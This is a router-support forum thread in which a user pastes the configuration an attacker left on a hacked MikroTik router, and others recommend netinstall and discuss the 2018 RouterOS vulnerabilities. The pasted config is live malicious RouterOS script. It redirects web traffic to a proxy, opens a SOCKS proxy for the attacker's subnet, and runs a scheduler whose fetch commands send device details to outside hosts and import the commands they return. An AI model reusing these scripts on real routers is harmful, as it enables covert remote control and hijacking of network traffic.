Can't Upgrade router mikrotik because hacked

fitrah6 · September 20, 2018, 10:38am

Hello guys,

My router was hacked, and now client from LAN network can’t access some web (just some web, not at all). After remove configuration that configured by hacker, i try to upgrade the routeros version. And i can’t upgrade routeros via /system packages and manual upload file .npk. How to fix this issue without netinstall, because the router is so far from my location.
This is the configuration that made by hacker :

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp src-address-list=!Ok to-ports=8080
/ip proxy
set anonymous=yes enabled=yes
/ip proxy access
add action=deny
/ip socks
set port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system scheduler
add interval=3m name=“DDNS Serv” on-event=“/system script run iDDNS” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/system script
add name=script4_ owner=userpolicy=ftp,reboot,read,write,policy,test,password,sensitive source=
“/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no”
add name=iDDNS owner=userpolicy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=“:global mac [/interface ethern
et get 1 mac-address]\r
\n:global port ([/ip service get winbox port]."".[/ip socks get port]."".[/ip proxy get port])\r
\n:global info ([/ip socks get enabled]."".[/ip proxy get enabled]."".[/interface pptp-server server get enabled])\r
\n:global cmd "/$mac/$port/$info/dns"\r
\n/tool fetch address=src-ip.com src-path=$cmd mode=http dst-path=dns;:delay 3s\r
\n/import dns;:delay 4s;/file remove dns”

Best Regards
Fitrah Ali Hudzaifah Sofyan

GREG3f · October 10, 2018, 12:40am

I have the same issue, did anyone find a solution other than netinstall?

R1CH · October 10, 2018, 10:15am

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.

sindy · October 20, 2018, 5:05pm

@Victoria168, none of the correct hints you gave can help after the malware has already squatted at the machine. So as the things stand now, netinstall is the only way.

limbo · January 11, 2019, 5:08pm

Although I’m not answering to the starting question, my device was hacked too and I was forced to use netinstall.

So my questions are:
How the intruder gained access in the first place?
What’s the use of this hack (remote control, packet sniff, ddos attacks, bitcoin mining)?
How can I check if the device my devices timely if are secure or not? I discover it when winbox access was blocked.

Any tips?

sebastia · January 11, 2019, 7:53pm

There were a number of known bugs on versions up to and including 6.42. Some of these exploits could lead to low level system access, below what an administrator has access to.
Which version were you at?

Tips: follow security blog and upgrade…

anav · January 11, 2019, 8:00pm

My understanding sebastia, is that the bugs were exploitable if basic security practices were not followed.